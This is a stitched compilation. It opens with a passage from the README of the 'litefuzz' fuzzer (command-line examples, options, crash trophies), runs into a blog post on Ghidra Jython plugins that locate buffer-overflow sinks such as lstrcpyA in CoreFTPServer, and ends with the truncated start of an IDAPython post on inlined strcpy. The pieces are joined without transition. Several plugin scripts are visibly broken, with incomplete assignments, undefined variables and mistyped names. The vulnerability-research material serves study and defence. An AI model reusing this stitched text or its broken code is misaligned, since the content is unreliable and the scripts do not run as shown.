[+] reduced crash @ pc=555555562170 to 17 bytes

@ 17/17 (2 new crashes, 17 -> 17 bytes, ~0:00:00 remaining)

[+] achieved maximum minimization @ 17 bytes (test.min.tex)

[RESULTS]
completed (17) iterations with 2 new crashes found

command

--cmd allows a user to specify a command to run after each iteration. This can be used to cleanup certain operations that would otherwise take up resources on the system.

litefuzz -l -c "/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter FUZZ" -i input/dmg --cmd "umount /Volumes/test.dir" --click -x 5 -n 100000 -ez

examples

local app

quick look

litefuzz -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -x 1 -n 100
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 4
iterations: 100
mutator: random(mutators)

@ 100/100 (1 crashes, 4 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (100) iterations with (1) unique crashes and 4 dups
>> check crashes/latex2rtf dir for more details

enumerating file handlers on Ubuntu

$ cat /usr/share/applications/defaults.list
[Default Applications]
application/csv=libreoffice-calc.desktop
application/excel=libreoffice-calc.desktop
application/msexcel=libreoffice-calc.desktop
application/msword=libreoffice-writer.desktop
application/ogg=rhythmbox.desktop
application/oxps=org.gnome.Evince.desktop
application/postscript=org.gnome.Evince.desktop
....

fuzz the local tcpdump's pcap parsing (Linux)

litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps

fuzz Evice document reader (Linux GUI)

litefuzz -l -c "evince FUZZ" -i input/oxps -x 1 -n 10000

fuzz antiword (oldie but good test app :) (Linux)

litefuzz -l -c "antiword FUZZ" -i input/doc -ez

note: you can (and probably should) pass -z to enable Electric Fence (or fallback to glibc's feature) for heap error checking

enumerating file handlers on OS X

swda can enumerate file handlers on Mac.

$ ./swda getUTIs | grep -Ev "No application set"
com.adobe.encapsulated-postscript /System/Applications/Preview.app
com.adobe.flash.video /System/Applications/QuickTime Player.app
com.adobe.pdf /System/Applications/Preview.app
com.adobe.photoshop-image /System/Applications/Preview.app
....

fuzz gpg decryption via stdin with heap error checking (Mac)

litefuzz -l -c "gpg --decrypt" -i test-gpg -o crashes-gpg -z

fuzz Books app (Mac GUI)

litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub -t "/Users/test/Library/Containers/com.apple.iBooksX/Data" -x 8 -n 100000 -z

note: -z here enables Guard Malloc heap error checking in order to detect subtle heap corruption bugs

mac note

Some GUI targets may fail to be killed after each iteration's timeout and become unresponsive. To mitigate this, you can run a script that looks like this in another terminal to just periodically kill them in batch to reduce manual effort and monitoring, else the fuzzing process may be affected.

#!/bin/bash
ps -Af | grep -ie "$1" | awk '{print $2}' | xargs kill -9
$ while :; do ./pkill.sh "Process Name /Users/test"; sleep 360; done

/Users/test (example for the first part of the path where temp files are being passed to the local GUI app, FUZZ becomes a path during execution) was chosen as you need a unique string to kill for processes, and if you only use the Process Name, it will kill the fuzzing process as it contains the Process Name too.

enumerating file handlers on Windows

Using the AssocQueryString script with the assoc command can map file extensions to default applications.

C:\> .\AssocQueryString.ps1
...
.hlp :: C:\Windows\winhlp32.exe
.hta :: C:\Windows\SysWOW64\mshta.exe
.htm :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.html :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.icc :: C:\Windows\system32\colorcpl.exe
.icm :: C:\Windows\system32\colorcpl.exe
.imesx :: C:\Windows\system32\IME\SHARED\imesearch.exe
.img :: C:\Windows\Explorer.exe
.inf :: C:\Windows\system32\NOTEPAD.EXE
.ini :: C:\Windows\system32\NOTEPAD.EXE
.iso :: C:\Windows\Explorer.exe

When fuzzing on Windows, you may want to enable PageHeap and Memory Dumps for a better fuzzing experience (unless your target doesn't like them) prior to starting a new fuzzing run.

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -z

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

Yes, run these commands using (g)sudo on Windows to easily elevate to Admin from the console and make the registry changes needed for the features to be enabled. And this also illustrates another nuance for enabling malloc debuggers for targets: on Linux and Mac, we're using runtime environment flags which need to be passed every time to enable this feature. For Windows, we're modifying the registry so once it's passed the first time, one doesn't need to pass -z or --memdump in the fuzzing command line again (unless to disable or re-enable them).

fuzz PuTTY (puttygen) (Windows)

litefuzz -l -c "C:\Program Files (x86)\WinSCP\PuTTY\puttygen.exe FUZZ" -i input\ppk -x 0.5 -n 100000 -z

fuzz Adobe Reader like back in the day (Windows GUI)

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -i pdfs -x 3 -n 100000 -z

(WinAppDbg only supports python 2, so must use py2 on Windows)

note: reminder that you can enable PageHeap for the target app via -z in an elevanted prompt or using the installed sudo for gsudo win32 package that was installed during setup

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -z

client

quick look

litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh-cli -o crashes/ssh -p -n 250000 -z glibc
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 9404
cmdline: ssh -T test@localhost -p 2222
address: tcp://localhost:2222
crash dir: crashes/ssh
input dir: input/ssh-cli
inputs: 4
iterations: 250000
mutator: random(mutators)

@ 73/250000 (0 crashes, 0 duplicates, ~1 day, 0:21:01 remaining)^C

resume? (y/n)> n
Terminated
...

cat /tmp/litefuzz/out
padding error: need 57895 block 8 mod 7
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

local client

fuzz SNMP client on the localhost (Linux)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

remote client

fuzz a remote FTP client (Linux)

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -n 100

note: depending on the target, client fuzzing may require listening on a privileged port (1-1024). In this case, on Linux you can either setcap cap_net_bind_service=+ep on the python interpreter or use sudo when running the fuzzer, on Mac just use sudo and on Windows you can run the fuzzer as Administrator to avoid any Permission Denied errors.

server

quick look

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 4001
cmdline: ./sc_serv shoutcast.conf
address: tcp://localhost:8000
crash dir: crashes/shoutcast
input dir: input/shoutcast
inputs: 3
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (1 crashes, 7 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (1) unique crashes and 7 dups
>> check crashes/shoutcast for more details

local server

fuzz a local Shoutcast server

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z

remote server

fuzz a remote SMTP server

litefuzz -s -a tcp://10.0.0.11:25 -i input/smtp-req -pp -n 10000

command line

usage: litefuzz.py [-h] [-l] [-k] [-s] [-c CMDLINE] [-i INPUTS] [-n ITERATIONS] [-x MAXTIME] [--mutator MUTATOR] [-a ADDRESS] [-o CRASHDIR] [-t TEMPDIR] [-f FUZZFILE]
[-m MINFILE] [-mm SUPERMIN] [-r REPROFILE] [-e] [-p] [-pp] [-u] [--nofuzz] [--key KEY] [--click] [--tls] [--golang] [--attach ATTACH] [--cmd CMD]
[--rmfile RMFILE] [--reportcrash REPORTCRASH] [--memdump] [--nomemdump] [-z [MALLOC]] [-zz] [-d]

optional arguments:
-h, --help show this help message and exit
-l, --local target will be executed locally
-k, --client target a network client
-s, --server target a network server
-c CMDLINE, --cmdline CMDLINE
target command line
-i INPUTS, --inputs INPUTS
input directory or file
-n ITERATIONS, --iterations ITERATIONS
number of fuzzing iterations (default: 1)
-x MAXTIME, --maxtime MAXTIME
timeout for the run (default: 1)
--mutator MUTATOR, --mutator MUTATOR
timeout for the run (default: 0=random)
-a ADDRESS, --address ADDRESS
server address in the ip:port format
-o CRASHDIR, --crashdir CRASHDIR
specify the directory to output crashes (default: crashes)
-t TEMPDIR, --tempdir TEMPDIR
specify the directory to output runtime fuzzing artifacts (default: OS tmp + run dir)
-f FUZZFILE, --fuzzfile FUZZFILE
specify the path and filename to place the fuzzed file (default: OS tmp + run dir + fuzz_random.ext)
-m MINFILE, --minfile MINFILE
specify a crashing file to generate a minimized version of it (bonus: may also find variant bugs)
-mm SUPERMIN, --supe rmin SUPERMIN
loops minimize to grind on until no more bytes can be removed
-r REPROFILE, --reprofile REPROFILE
specify a crashing file or directory to replay on the target
-e, --reuse enable second round fuzzing where any crashes found are reused as inputs
-p, --multibin use multiple requests or responses as inputs for fuzzing simple binary network sessions
-pp, --multistr use multiple requests or responses within input for fuzzing simple string-based network sessions
-u, --insulate only execute the target once and inside a debugger (eg. interactive clients)
--nofuzz, --nofuzz send input as-is without mutation (useful for debugging)
--key KEY, --key KEY send a particular key every iteration for interactive targets (eg. F5 for refresh)
--click, --click click the mouse (eg. position the cursor over target button to click beforehand)
--tl s, --tls enable TLS for network fuzzing
--golang, --golang enable fuzzing of Golang binaries
--attach ATTACH, --attach ATTACH
attach to a local server process name (mac only)
--cmd CMD, --cmd CMD execute this command after each fuzzing iteration (eg. umount /Volumes/test.dir)
--rmfile RMFILE, --rmfile RMFILE
remove this file after every fuzzing iteration (eg. target won't overwrite output file)
--reportcrash REPORTCRASH, --reportcrash REPORTCRASH
use ReportCrash to help catch crashes for a specified process name (mac only)
--memdump, --memdump enable memory dumps (win32)
--nomemdump, --nomemdump
disable memory dumps (win32)
-z [MALLOC], --malloc [MALLOC]
enable malloc debug helpers (free bugs, but perf cost)
-zz, --nomalloc disable malloc debug helpers (eg. pageheap)
-d, --debug Turn on debug statements

trophies

Litefuzz has fuzzed crashes out of various software packages such as...

  • antiword
  • AppleScript (OS X)
  • ArangoDB VelocyPack
  • Avast authenticode-parser
  • Avast RetDec
  • BBC Audio Waveform
  • ColorSync (OS X)
  • Dynamsoft BarcodeReader
  • eot2ttf
  • evernote2md
  • faad2
  • Facebook's Origami Studio
  • FontForge
  • ForestDB
  • Gifsicle
  • GPUJPEG
  • GPAC Multimedia Framework
  • Google Draco
  • GoPro GPR
  • GtkRadiant
  • IIPImage Server
  • John The Ripper
  • Kyoto Cabinet
  • latex2rtf
  • libMeshb
  • libembroidery
  • libsndfile
  • Lion Vector Graphics (lvg)
  • L-SMASH
  • MindNode
  • minimp4
  • MiniWeb Server
  • MLpack
  • Nvidia Data Center GPU Manager
  • Numbers (OS X)
  • OpenJPEG
  • OpenOrienteering Mapper
  • OSM Express
  • Pages (OS X)
  • PBRT-Parser
  • Pixar USD
  • Remote Apple Events (OS X)
  • Samsung rlottie
  • Samsung ThorVG
  • Shoutcast Server
  • Silo
  • syslog (OS X)
  • Tencent NCNN
  • TinyXML2
  • UEFITool
  • Ulfius Web Framework
  • zlib

FAQ

how did this project come about?

Fuzzing is fun! And it's nice to do projects which take a contrarian type of view that fuzzers don't always have to follow the modern or popular approaches to get to the end goal of finding bugs. Whether you're close to bare metal, getting code coverage across all paths or simply optimizing on the fast and flexible, the fundamental "invalidating assumptions" way of doing things, etc. However it manifests, enjoy it.

is this project actively maintained?

Please do not expect active support or maintenance on the project. Feel free to fork it to add new features or fix bugs, etc. Perhaps even do a PR for smaller things, although please do no have no expectations for responses or troubleshooting. It is not intended for development on this repo to be active.

how do you know the fuzzer is working well and did you measure it against others?

The purpose of Litefuzz is to find bugs across platforms. And it does. So, honestly the ability to measure it against fuzzerX or fuzzerY just didn't make the cut. Certain trade-offs were made and acknowledged at inception, see the #intro for more details.

what would you change if you were to re-write it today?

It works pretty well as it is and has been tested on a ton of different targets and scenarios. That being said, it could benefit standardizing on a more modular-based and plugin system where switching between targets and platforms didn't require as many additional checks in the operations side of the code, etc. Of course having more formal tests and a deployment system that would test it across supporting operating systems would create an environment that easier to work across when making changes to core functions. It grew from a small yet amibitious project into something a little bigger pretty quickly.

how stable is litefuzz?

The command line, GUI, network fuzzing (mostly on Linux and Mac), minimization, etc has been tested pretty thoroughly and should be pretty solid overall. Some of the more exotic features such as insulated network GUI fuzzing, ReportCrash support for Mac and some other niche features should be considered experimental.

are there unsupported scenarios for litefuzz?

A few of them, yes. But most are either uncommon scenarios that are buggy, required more time and research to "get right" or just don't quite work for platform related reasons. Many of them are explicitly exit with an "unsupported" message when you try to run it with such options and some caveats have been mentioned in the sections above when describing various features. Some of the more nuanced ones include repro mode on insulated apps isn't supported and also there's been limited testing on Mac apps using the insulate feature, Pyautogui seems to work fine on Linux and Windows but on Mac it didn't prove very reliable so consider it functionally unsupported and client fuzzing on Windows can be a little less reliable than other modes on other platforms.

There may be some edge cases here and there, but the most common local and network fuzzing scenarios have been tested and are working. Ah, these are joys of writing cross-platform tooling: rewarding, but it's hard to make everything work great all the time. Overall, fuzzing on Linux/Mac seems to be more stable and support more features overall, especially as it's had much more testing of network fuzzing than on the Windows platform, but an effort was made for at least the basics to be available on Win32 with a couple extras.

Feel free to fork this fuzzer and make such improvements, support the currently unsupported, etc or PRs for more minor but useful stuff.

what guarentees are given for this project or it's code?

Absolutely none. But it's pretty fun to fuzz and watch it hand you bugs.

author / references



Ghidra Plugin Development for Vulnerability Research - Part-1

Overview

On March 5th at the RSA security conference, the National Security Agency (NSA) released a reverse engineering tool called Ghidra. Similar to IDA Pro, Ghidra is a disassembler and decompiler with many powerful features (e.g., plugin support, graph views, cross references, syntax highlighting, etc.). Although Ghidra's plugin capabilities are powerful, there is little information published on its full capabilities.  This blog post series will focus on Ghidra’s plugin development and how it can be used to help identify software vulnerabilities.

In our previous post, we leveraged IDA Pro’s plugin functionality to identify sinks (potentially vulnerable functions or programming syntax).  We then improved upon this technique in our follow up blog post to identify inline strcpy calls and identified a buffer overflow in Microsoft Office. In this post, we will use similar techniques with Ghidra’s plugin feature to identify sinks in CoreFTPServer v1.2 build 505.

Ghidra Plugin Fundamentals

Before we begin, we recommend going through the example Ghidra plugin scripts and the front page of the API documentation to understand the basics of writing a plugin. (Help -> Ghidra API Help)

When a Ghidra plugin script runs, the current state of the program will be handled by the following five objects:

  • currentProgram: the active program

  • currentAddress: the address of the current cursor location in the tool

  • currentLocation: the program location of the current cursor location in the tool, or null if no program location exists

  • currentSelection: the current selection in the tool, or null if no selection exists

  • currentHighlight: the current highlight in the tool, or null if no highlight exists

It is important to note that Ghidra is written in Java, and its plugins can be written in Java or Jython. For the purposes of this post, we will be writing a plugin in Jython. There are three ways to use Ghidra’s Jython API:

  • Using Python IDE (similar to IDA Python console):

  • Loading a script from the script manager:

  • Headless - Using Ghidra without a GUI:

With an understanding of Ghidra plugin basics, we can now dive deeper into the source code by utilizing the script manager (Right Click on the script -> Edit with Basic Editor)

The example plugin scripts are located under /path_to_ghidra/Ghidra/Features/Python/ghidra_scripts. (In the script manager, these are located under Examples/Python/):


Ghidra Plugin Sink Detection

In order to detect sinks, we first have to create a list of sinks that can be utilized by our plugin. For the purpose of this post, we will target the sinks that are known to produce buffer overflow vulnerabilities. These sinks can be found in various write-ups, books, and publications.

Our plugin will first identify all function calls in a program and check against our list of sinks to filter out the targets. For each sink, we will identify all of their parent functions and called addresses. By the end of this process, we will have a plugin that can map the calling functions to sinks, and therefore identify sinks that could result in a buffer overflow.

Locating Function Calls

There are various methods to determine whether a program contains sinks. We will be focusing on the below methods, and will discuss each in detail in the following sections:

  1. Linear Search - Iterate over the text section (executable section) of the binary and check the instruction operand against our predefined list of sinks.

  2. Cross References (Xrefs) - Utilize Ghidra’s built in identification of cross references and query the cross references to sinks.

Linear Search

The first method of locating all function calls in a program is to do a sequential search. While this method may not be the ideal search technique, it is a great way of demonstrating some of the features in Ghidra’s API.

Using the below code, we can print out all instructions in our program:

listing = currentProgram.getListing() #get a Listing interface
ins_list = listing.getInstructions(1) #get an Instruction iterator
while ins_list.hasNext():             #go through each instruction and print it out to the console
    ins = ins_list.next()
    print (ins)

Running the above script on CoreFTPServer gives us the following output:

We can see that all of the x86 instructions in the program were printed out to the console.


Next, we filter for sinks that are utilized in the program. It is important to check for duplicates as there could be multiple references to the identified sinks.

Building upon the previous code, we now have the following:

sinks = [ 
         "strcpy",
         "memcpy",
         "gets",
         "memmove",
         "scanf",
         "lstrcpy",
         "strcpyW",
         #...
         ]
duplicate = []
listing = currentProgram.getListing() 
ins_list = listing.getInstructions(1) 
while ins_list.hasNext():           
    ins = ins_list.next()    
    ops = ins.getOpObjects(0)    
    try:        
        target_addr = ops[0]  
        sink_func = listing.getFunctionAt(target_addr) 
        sink_func_name = sink_func.getName()         
        if sink_func_name in sinks and sink_func_name not in  duplicate:
            duplicate.append(sink_func_name) 
            print (sink_func_name,target_addr) 
    except:
        pass    


Now that we have identified a list of sinks in our target binary, we have to locate where these functions are getting called. Since we are iterating through the executable section of the binary and checking every operand against the list of sinks, all we have to do is add a filter for the call instruction.

Adding this check to the previous code gives us the following:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate through each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            target_addr = ops[0]
            sink_func = listing.getFunctionAt(target_addr)
            sink_func_name = sink_func.getName()
            #check to see if function being called is in the sinks list
            if sink_func_name in sinks and sink_func_name not in duplicate:
                duplicate.append(sink_func_name)
                print (sink_func_name,target_addr)
        except:
	        pass

Running the above script against CoreFTPServer v1.2 build 505 shows the results for all detected sinks:

Unfortunately, the above code does not detect any sinks in the CoreFTPServer binary. However, we know that this particular version of CoreFTPServer is vulnerable to a buffer overflow and contains the lstrcpyA sink. So, why did our plugin fail to detect any sinks?

After researching this question, we discovered that in order to identify the functions that are calling out to an external DLL, we need to use the function manager that specifically handles the external functions.

To do this, we modified our code so that every time we see a call instruction we go through all external functions in our program and check them against the list of sinks. Then, if they are found in the list, we verify whether that the operand matches the address of the sink.

The following is the modified section of the script:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

program_sinks = {}
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)
ext_fm = fm.getExternalFunctions()

#iterate through each of the external functions to build a dictionary
#of external functions and their addresses
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
   
    #if the function is a sink then add it's address to a dictionary
    if target_func in sinks: 
        loc = ext_func.getExternalLocation()
        sink_addr = loc.getAddress()
        sink_func_name = loc.getLabel()
        program_sinks[sink_addr] = sink_func_name

#iterate through each instruction 
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            #get address of operand
            target_addr = ops[0]   
            #check to see if address exists in generated sink dictionary
            if program.sinks.get(target_addr):
                print (program_sinks[target_addr], target_addr,ins.getAddress()) 
        except:
            pass

Running the modified script against our program shows that we identified multiple sinks that could result in a buffer overflow.


Xrefs

The second and more efficient approach is to identify cross references to each sink and check which cross references are calling the sinks in our list. Because this approach does not search through the entire text section, it is more efficient.

Using the below code, we can identify cross references to each sink:


sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
func = getFirstFunction()

while func is not None:
    func_name = func.getName()
    
    #check if function name is in sinks list
    if func_name in sinks and func_name not in duplicate:
        duplicate.append(func_name)
        entry_point = func.getEntryPoint()
        references = getReferencesTo(entry_point)
	#print cross-references    
        print(references)
    #set the function to the next function
    func = getFunctionAfter(func)

Now that we have identified the cross references, we can get an instruction for each reference and add a filter for the call instruction. A final modification is added to include the use of the external function manager:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
fm = currentProgram.getFunctionManager()
ext_fm = fm.getExternalFunctions()

#iterate through each external function
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
    
    #check if the function is in our sinks list 
    if target_func in sinks and target_func not in duplicate:
        duplicate.append(target_func)
        loc = ext_func.getExternalLocation()
        sink_func_addr = loc.getAddress()    
        
        if sink_func_addr is None:
            sink_func_addr = ext_func.getEntryPoint()

        if sink_func_addr is not None:
            references = getReferencesTo(sink_func_addr)

            #iterate through all cross references to potential sink
            for ref in references:
                call_addr = ref.getFromAddress()
                ins = listing.getInstructionAt(call_addr)
                mnemonic = ins.getMnemonicString()

                #print the sink and address of the sink if 
                #the instruction is a call instruction
                if mnemonic == “CALL”:
                    print (target_func,sink_func_addr,call_addr)

Running the modified script against CoreFTPServer gives us a list of sinks that could result in a buffer overflow:



Mapping Calling Functions to Sinks

So far, our Ghidra plugin can identify sinks. With this information, we can take it a step further by mapping the calling functions to the sinks. This allows security researchers to visualize the relationship between the sink and its incoming data. For the purpose of this post, we will use graphviz module to draw a graph.

Putting it all together gives us the following code:

from ghidra.program.model.address import Address
from ghidra.program.model.listing.CodeUnit import *
from ghidra.program.model.listing.Listing import *

import sys
import os

#get ghidra root directory
ghidra_default_dir = os.getcwd()

#get ghidra jython directory
jython_dir = os.path.join(ghidra_default_dir, "Ghidra", "Features", "Python", "lib", "Lib", "site-packages")

#insert jython directory into system path 
sys.path.insert(0,jython_dir)

from beautifultable import BeautifulTable
from graphviz import Digraph


sinks = [
    "strcpy",
    "memcpy",
    "gets",
    "memmove",
    "scanf",
    "strcpyA", 
    "strcpyW", 
    "wcscpy", 
    "_tcscpy", 
    "_mbscpy", 
    "StrCpy", 
    "StrCpyA", 
    "StrCpyW", 
    "lstrcpy", 
    "lstrcpyA", 
    "lstrcpyW", 
    #...
]

sink_dic = {}
duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate over each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    mnemonic = ins.getMnemonicString()
    ops = ins.getOpObjects(0)
    if mnemonic == "CALL":	
        try:
            target_addr = ops[0]
            func_name = None 
            
            if isinstance(target_addr,Address):
                code_unit = listing.getCodeUnitAt(target_addr)
                if code_unit is not None:
                    ref = code_unit.getExternalReference(0)	
                    if ref is not None:
                        func_name = ref.getLabel()
                    else:
                        func = listing.getFunctionAt(target_addr)
                        func_name = func.getName()

            #check if function name is in our sinks list
            if func_name in sinks and func_name not in duplicate:
                duplicate.append(func_name)
                references = getReferencesTo(target_addr)
                for ref in references:
                    call_addr = ref.getFromAddress()
                    sink_addr = ops[0]
                    parent_func_name = getFunctionBefore(call_addr).getName()

                    #check sink dictionary for parent function name
                    if sink_dic.get(parent_func_name):
                        if sink_dic[parent_func_name].get(func_name):
                            if call_addr not in sink_dic[parent_func_name][func_name]['call_address']:
                                sink_dic[parent_func_name][func_name]['call_address'].append(call_addr)
                            else:
                                sink_dic[parent_func_name] = 
                    else:	
                        sink_dic[parent_func_name] = 				
        except:
            pass

#instantiate graphiz
graph = Digraph("ReferenceTree")
graph.graph_attr['rankdir'] = 'LR'
duplicate = 0

#Add sinks and parent functions to a graph	
for parent_func_name,sink_func_list in sink_dic.items():
    #parent functions will be blue
    graph.node(parent_func_name,parent_func_name, style="filled",color="blue",fontcolor="white")
    for sink_name,sink_list in sink_func_list.items():
        #sinks will be colored red
        graph.node(sink_name,sink_name,style="filled", color="red",fontcolor="white")
        for call_addr in sink_list['call_address']:
	    if duplicate != call_addr:					
                graph.edge(parent_func_name,sink_name, label=call_addr.toString())
                duplicate = call_addr	

ghidra_default_path = os.getcwd()
graph_output_file = os.path.join(ghidra_default_path, "sink_and_caller.gv")

#create the graph and view it using graphiz
graph.render(graph_output_file,view=True)

Running the script against our program shows the following graph:

We can see the calling functions are highlighted in blue and the sink is highlighted in red. The addresses of the calling functions are displayed on the line pointing to the sink.

After conducting some manual analysis we were able to verify that several of the sinks identified by our Ghidra plugin produced a buffer overflow. The following screenshot of WinDBG shows that EIP is overwritten by 0x42424242 as a result of an lstrcpyA function call.  

Additional Features

Although visualizing the result in a graph format is helpful for vulnerability analysis, it would also be useful if the user could choose different output formats.

The Ghidra API provides several methods for interacting with a user and several ways of outputting data. We can leverage the Ghidra API to allow a user to choose an output format (e.g. text, JSON, graph) and display the result in the chosen format. The example below shows the dropdown menu with three different display formats. The full script is available at our github:

Limitations

There are multiple known issues with Ghidra, and one of the biggest issues for writing an analysis plugin like ours is that the Ghidra API does not always return the correct address of an identified standard function.

Unlike IDA Pro, which has a database of function signatures (FLIRT signatures) from multiple libraries that can be used to detect the standard function calls, Ghidra only comes with a few export files (similar to signature files) for DLLs.  Occasionally, the standard library detection will fail.

By comparing IDA Pro and Ghidra’s disassembly output of CoreFTPServer, we can see that IDA Pro’s analysis successfully identified and mapped the function lstrcpyA using a FLIRT signature, whereas Ghidra shows a call to the memory address of the function lstrcpyA.

Although the public release of Ghidra has limitations, we expect to see improvements that will enhance the standard library analysis and aid in automated vulnerability research.

Conclusion

Ghidra is a powerful reverse engineering tool that can be leveraged to identify potential vulnerabilities. Using Ghidra’s API, we were able to develop a plugin that identifies sinks and their parent functions and display the results in various formats. In our next blog post, we will conduct additional automated analysis using Ghidra and enhance the plugins vulnerability detection capabilities.

Introduction to IDAPython for Vulnerability Hunting - Part 2

Overview

In our last post we reviewed some basic techniques for hunting vulnerabilities in binaries using IDAPython. In this post we will expand upon that work and extend our IDAPython script to help detect a real Microsoft Office vulnerability that was recently found in the wild. The vulnerability that will be discussed is a remote code execution vulnerability that existed in the Microsoft Office EQNEDT32.exe component which was also known as the Microsoft Office Equation Editor. This program was in the news in January when, due to a number of discovered vulnerabilities. Microsoft completely removed the application (and all of its functionality) from Microsoft Office in a security update. The vulnerabilities that ended up resulting in Equation Editor being killed are of the exact type that we attempted to identify with the script written in the previous blog post. However, calls to strcpy in the Equation Editor application were optimized out and inlined by the compiler, rendering the script that we wrote previously ineffective at locating the vulnerable strcpy usages.

While the techniques that we reviewed in the previous post are useful in finding a wide range of dangerous function calls, there are certain situations where the script as written in the previous blog post will not detect the dangerous programming constructs that we intend and would expect it to detect. This most commonly occurs when compiler optimizations are used which replace function calls to string manipulation functions (such as strcpy and strcat) with inline assembly to improve program performance. Since this optimization removes the call instruction that we relied upon in our previous blog post, our previous detection method does not work in this scenario. In this post we will cover how to identify dangerous function calls even when the function call itself has been optimized out of the program and inlined.

Understanding the Inlined strcpy()

Before we are able to find and detect inlined calls to strcpy, we first need to understand what an inlined strcpy would look like. Let us take a look at an IDA Pro screenshot below that shows the disassembly view side-by-side with the HexRays decompiler output of an instance where a call to strcpy is inlined.

Example of inlined strcpy() - Disassembly on left, HexRays decompiled version on right

In the above screenshot we can observe that the decompiler output on the right side shows that a call to strcpy in made, but when we look to the left side disassembly there is not a corresponding call to strcpy. When looking for inlined string functions, a common feature of the inlined assembly to watch for is the use of the “repeat” assembly instructions (rep, repnz, repz) in performing the string operations. With this in mind, let’s dig into the disassembly to see what the compiler has used to replace strcpy in the disassembly above.

 

First, we observe the instruction at 0x411646: `repne scasb`. This instruction is commonly used to get the length of a string (and is often used when strlen() is inlined by the compiler). Looking at the arguments used to set up the `repne scasb` call we can see that it is getting the length of the string “arg_0”. Since performing a strcpy requires knowing the length of the source string (and consequently the number of bytes/characters to copy), this is typically the first step in performing a strcpy.

 

Next we continue down and see two similar looking instructions in `rep movsd` and `rep movsb`. These instructions copy a string located in the esi register into the edi register. The difference between these two instructions being the `rep movsd` instruction moves DWORDs from esi to edi, while `rep movsb` copies bytes. Both instructions repeat the copy instruction a number of times based upon the value in the ecx register.

 

Viewing the above code we can observe that the code uses the string length found by `repne scasb` instruction in order to determine the size of the string that is being copied. We can observe this by viewing seeing that following instruction 0x41164C the length of the string is stored in both eax and ecx. Prior to executing the `rep movsd` instruction we can see that ecx is shifted right by two. This results in only full DWORDs from the source string being copied to the destination. Next we observe that at instruction 0x41165A that the stored string length is moved back into ecx and then bitwise-AND’d with 3. This results in any remaining bytes that were not copied in the `rep movsd` instruction to be copied to the destination.  

 

Automating Vuln Hunting with the Inlined strcpy()

Now that we understand how the compiler optimized strcpy function calls we are able to enhance our vulnerability hunting scripts to allow us to find instances where they an inlined strcpy occurs. In order to help us do this, we will use the IDAPython API and the search functionality that it provides us with. Looking at the above section the primary instructions that are more or less unique to strcpy are the `rep movsd` with the `rep movsb` instruction following shortly thereafter to copy any remaining uncopied bytes.

 

So, using the IDAPython API to search for all instances of `rep movsd` followed by `rep movsb` 7 bytes after it gives us the following code snippet:

 

ea = 0
while ea != BADADDR:
